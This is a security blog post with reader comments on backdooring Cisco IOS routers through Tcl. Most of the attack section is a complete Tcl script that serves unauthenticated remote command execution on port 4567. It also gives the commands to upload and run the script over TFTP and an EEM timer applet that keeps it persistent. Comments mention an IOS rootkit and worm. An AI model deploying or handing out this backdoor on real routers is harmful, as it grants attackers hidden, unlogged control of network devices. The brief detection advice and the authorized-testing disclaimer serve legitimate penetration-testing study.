Attacking Cisco Router over TCL
Today only lazy or out from the IT sphere person never heard about Cisco. Company specialized in developing network devices and solving all related problems. IOS (Internetwork Operation System) is installed on Cisco networking equipment and allows flexible system configuration. There is different method for attacking Cisco devices but what we will be looking at is attacking Cisco devices using TCL.
Tcl (Tool Command Language) is a scripting language used on embedded systems platforms, both in its full form and in several other small-footprinted versions. From Cisco IOS version 12.3 (7/28/2003), TCL has been included in Cisco IOS as a generic scripting language.
When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. Now for TCL we need privilege level 15 (full admin) rights to execute a script, this level is equivalent to having root privileges in UNIX or administrator privileges in Windows.
For uploading the TCL script to cisco device we can use different protocols such as TFTP, RCP or SCP. For TFTP you do the following:
Router>en
Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl
Now the tcl script has been published by Andy Davis from the Information Risk Management and after some modefication it will looks as follows:
[php]proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " Enter your desired IOS command:"
puts $sock " "
puts -nonewline $sock “Router# ”
puts $sock $response
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 4567
set sh [socket -server callback $port]
vwait var
close $sh_[/php]
Here we will have a backdoor on the router, so if an attacker will run telnet on port 4567 he will have the following:
$ telnet router 4567
Trying router…
Connected to router.
Escape character is ‘^]’.
Enter your desired IOS command:
Router#
This vulnerability has been fixed in recent IOS versions, but you can still use the same technique if you convert the Tclsh script into an EEM policy and trigger it periodically with a timer event as follows:
Router>en
Router # Conf t
Router (config) # event manager applet Tclsh
Router (config-applet) # event timer countdown name Delay time 20
Router (config-applet) # action 1 cli command “enable”
Router (config-applet) # action 2 cli Tclsh tftp://tftpserver/script.tcl
By executing the backdoor a penetration tester can access to the targeted host, bypassing all security measures such as authentication or access logging. For detecting that your router is compromised you need to run:
Router # show tcp brief all
Which is equivalent to Netstat on windows or linux system and it will list all connection established or waiting to be established on the router. So for the security of your business make sure to have the latest IOS version, to update all your systems and to use best practices for implementing or configuring any device.
Warning: The technique demonstrated is intended just for the use during an authorized penetration testing mission.
Refrences:
Cisco IOS Scripting with Tcl
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html
SANS Institute IOScat – a Port of Netcat’s TCP functions to Cisco IOS http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964
make sure you subscribe to my RSS feed!
[…] This post was mentioned on Twitter by Jovi Umawing, Mourad Ben Lakhoua, Js Opdebeeck, Mourad ben lakhoua, A. Vanderslyke and others. A. Vanderslyke said: Attacking Cisco Router over TCL http://bit.ly/9tiVMH […]
[…] Attacking Cisco Router over TCL – sectechno.com When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. […]
yeah I demo’ed this at blackhat 2010
http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss
it was a IOS rootkit and a self propagating IOS worm. the rootkit had forward/reverse shell, traffic pcap dumper, malware httpd server and other stuff. It was all done in tclsh
Thanks for the Comment Jason, can I have more details about the lab?
here is the pdf, lots of examples of the rootkit+accessories, The worm is not public though.
http://www.surf.vi/docs/san_fran.pdf
Thanks for sharing Jason very interesting demonstartion.
This is one of the best posts that I’ve ever seen; you may include some more ideas in the same theme. I’m still waiting for some interesting thoughts from your side in your next post.
TCL Router Backdoor Kung-fu: Attacking Cisco Router over TCL | SecTechno: http://bit.ly/hZSje3
RT @indi303: Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez9 …
RT @indi303: Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez9 …
Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez98 talk @DojoSec
Attacking Cisco Router over TCL | SecTechno http://ow.ly/19YAQp
News Update: Attacking Cisco Router over TCL | SecTechno http://ow.ly/19YAQp
RT @yuridiogenes – Attacking Cisco Router over TCL http://bit.ly/bdvJtR
Attacking Cisco Router over TCL http://goo.gl/y21aA
RT @sectechno: Attacking #Cisco Router over #TCL http://bit.ly/a4lsIS #security
RT @sectechno: Attacking #Cisco Router over #TCL http://bit.ly/a4lsIS #security
first version of this attack (using tclsh) was fixed in IOS 12.4(15)T. Second (using EEM policy) in IOS 12.4(20)T1
Awesome.
For Router Pictures
[…] 今天逛国外站发现了一篇攻击Cisco路由器留后门的方法,虽然一年多没玩Cisco了,平时工作也用不到这东西,但是对Cisco还是那么热爱,呵呵!进入正题,这是一篇鸟语的文章,写的也不难,主要的意思就是拿到Cisco路由器的权限以后可以上传一个用TCL脚本语言写的后门程序到设备里面,以后就可以无需路由器管理权限远程Telne进路由器了,灰常给力!关于TCL脚本语言相信CCIE Security级别的Cisco高级玩家都比较熟悉,反正我当年学CCNP的时候课程里面几乎没怎么提到TCL脚本,这东西在Cisco下是个灰常给力的东西,可以帮助工程师完成很多蛋疼的活!例如:在设备上批量的去Ping一个IP地址段等操作。 […]
en
here,I have a question:
How To config TCL on cisco IOS if it not have been configed?IOS Verion > 12.4(20)T